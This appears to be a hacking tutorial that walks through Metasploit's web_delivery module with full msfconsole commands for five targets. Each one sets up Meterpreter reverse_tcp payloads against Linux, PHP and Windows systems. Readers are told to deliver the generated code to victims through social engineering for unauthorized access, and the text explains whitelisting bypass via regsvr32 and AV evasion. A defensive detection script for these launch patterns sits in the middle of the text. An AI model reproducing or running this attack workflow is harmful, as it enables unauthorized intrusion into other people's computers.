Hello friends! In this article you will learn how to exploit three different platforms
[Linux, Windows, PHP] using a single exploit of the Metasploit framework.
Requirement
Attacker: Kali Linux
Targeted platform: Windows, PHP, Linux [Ubuntu]
Open the terminal in Kali Linux and type “msfconsole” to load the Metasploit
framework, then run the exploit given below.
This module quickly fires up a web server that serves a payload. The provided command will download and execute the payload, using either the specified scripting language interpreter or "squiblydoo" via regsvr32.exe to bypass application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk, so it is less likely to trigger AV solutions, and it allows the privilege escalations supplied by Meterpreter.
When using either of the PSH targets, ensure the payload architecture matches the target computer, or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses the "squiblydoo" technique for bypassing application whitelisting: the signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and the PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
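A defender's view of the launch step described above, as an added example that is not part of the original article or of Metasploit: it flags process-creation events in which python, php, powershell.exe or regsvr32.exe is started with a URL on the command line. The event fields, the rule table and the sample events are assumptions constructed for illustration.

```python
import re

URL = re.compile(r"https?://[^\s\"'>]+", re.I)
# launcher name -> (extra token required in the command line, finding text)
RULES = {
    "python": (r"\s-c\s", "interpreter running inline code that references a URL"),
    "php": (r"\s-r\s", "interpreter running inline code that references a URL"),
    "powershell.exe": (r"", "PowerShell command line references a URL"),
    "regsvr32.exe": (r"/i:", "regsvr32 pointed at a remote scriptlet (squiblydoo)"),
}


def classify(event):
    """Return findings for one process-creation event (image + cmdline)."""
    image = event["image"].replace("\\", "/").lower()
    # Normalise python3 / python3.11 / php8.1 / python.exe to the bare name.
    name = re.sub(r"^(python|php)[\d.]*(\.exe)?$", r"\1", image.rsplit("/", 1)[-1])
    cmd = event["cmdline"]
    if name not in RULES or not URL.search(cmd):
        return []
    token, text = RULES[name]
    if not re.search(token, cmd, re.I):
        return []
    findings = [text]
    if name == "regsvr32.exe" and re.search(r"\.sct\b", cmd, re.I):
        findings.append(".sct file requested over HTTP")
    if name == "powershell.exe" and "/syswow64/" in image:
        findings.append("32-bit (SysWOW64) powershell.exe on a 64-bit host")
    return findings


# Constructed sample events; hosts, paths and the 192.0.2.10 address are made up.
EVENTS = [
    {"host": "ubuntu-01", "image": "/usr/bin/python3",
     "cmdline": 'python3 -c "<inline code fetching http://192.0.2.10:8080/a>"'},
    {"host": "win-01",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "<download and run http://192.0.2.10:8080/a>"'},
    {"host": "win-02", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /i:http://192.0.2.10:8080/a.sct scrobj.dll"},
    {"host": "win-02", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\App\control.dll"},
    {"host": "ubuntu-01", "image": "/usr/bin/python3",
     "cmdline": "python3 manage.py runserver"},
]


def triage(events):
    """Map event index -> findings for every event that matched a rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}
```

The two benign events (a local DLL registration and an ordinary Python script run) produce no findings, which is the false-positive check to repeat against your own process-creation logs before alerting on these rules.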
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>show targets
In the image below you can observe that there are 5 targets, each of which helps you
generate malicious code to create a backdoor in the victim system.
Exploit Linux platform [python]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 0
msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we set target 0 to generate malicious code for the Python
platform. In the image below you can observe the highlighted malicious Python
code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in a terminal, the attacker
obtains a meterpreter session, giving unauthorized access to the victim system.
Exploit Web Server platform [PHP]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Now we set target 1 to generate malicious code for the PHP platform. In the
image below you can observe the highlighted malicious PHP code; copy it and
send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in a web browser, the attacker
obtains another meterpreter session, giving unauthorized access to the victim system.
Exploit Windows platform [exe]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Next, we set target 2 to generate malicious code for the Windows platform. In
the image below you can observe the highlighted malicious powershell.exe code;
copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code in a command prompt, the attacker
obtains a meterpreter session, giving unauthorized access to the victim system.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we set target 3 to generate malicious code for the Windows
platform. In the image below you can observe the highlighted malicious DLL
code; copy it and send it to the victim using a social engineering method.
As soon as the victim executes the malicious code as a run command inside the
RUN window, the attacker again obtains a meterpreter session and gains
unauthorized access to the victim system.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 4
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we set target 4 to generate malicious code for the Windows
platform. In the image below you can observe the highlighted malicious
powershell.exe binary code; copy it and send it to the victim using a social
engineering method.
As soon as the victim executes the malicious code in a command prompt, the attacker
obtains a meterpreter session, giving unauthorized access to the victim system.
Hence a single exploit, the “web delivery script”, is quite
helpful to hack three different platforms.